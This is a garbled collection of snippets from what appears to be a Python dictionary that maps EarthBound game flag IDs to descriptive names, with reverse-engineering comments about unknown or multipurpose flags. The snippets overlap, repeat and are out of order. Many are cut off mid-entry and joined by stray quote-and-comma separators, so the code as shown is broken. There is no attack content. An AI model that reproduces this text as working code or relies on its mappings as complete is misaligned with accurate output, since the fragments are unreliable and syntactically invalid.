641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2',", "'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON',", "565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571:", "'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME',", "the Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY',", "flags) # 229 (I hate multipurpose flags) # 230 (I hate multipurpose flags)", "continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479:", "Hieroglyph Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393:", "'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE',", "92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98:", "this differ from 72?) # 283 (???) 
284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286", "456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462:", "67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73:", "'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6',", "'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432:", "'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS',", "to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY',", "'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171:", "'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and not talking to", "Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT',", "111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117:", "308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown.", "395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401:", "88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94:", "202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208:", "flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY',", "'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL',", "483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489:", "129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135:", "765: 
'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you", "'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',", "'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused", "317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about", "246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252:", "'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS',", "This is only set if you're near (0x02A0, 0x0D70) in a radius of", "hate multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I hate", "room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room", "196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE',", "'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED',", "744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five", "'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP',", "'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778:", "'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2',", "them might be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',", "'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY',", "58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64:", "# 232 (I hate multipurpose flags) # 233 (I hate multipurpose flags) 234:", "Starman DX defeated. One of them might be responsible only for palette changes,", "494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500:", "Apple Kid calls you about the Gourmet Yogurt Machine) # 377 (???) 
#", "'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN',", "but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', #", "222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose", "'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED',", "165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???)", "520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', #", "241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247:", "258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264:", "'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',", "352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358:", "'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE',", "'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) # 55", "406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412:", "Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS',", "'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED',", "'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One", "'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 
432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might be responsible only for palette changes, maybe)
# 56 (Unknown)
57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE',
526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???)", "'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS',", "523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2',", "Luckily, every version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1',", "(???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',", "script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', #", "545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551:", "'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL',", "'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON',", "The first Hieroglyph Guardian doesn't reference this flag and never fights you 391:", "'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related", "'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',", "'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475", "Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI',", "'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',", "the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) #", "in Threed?) # 589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591:", "30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36:", "'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE',", "'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"? 
# This flag is set even if you don't talk to Apple Kid
66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED',", "'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID',", "'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142:", "'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER',", "773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', #", "349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355:", "'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT',", "557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563:", "'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE',", "462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467", "'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', #", "608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's", "'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',", "'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621:", "'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',", "(Visibility flag for someone in Threed?) # 589 (Visibility flag for some Hotel", "'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE',", "168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE',", "# 447 (???) # 448 (???) 
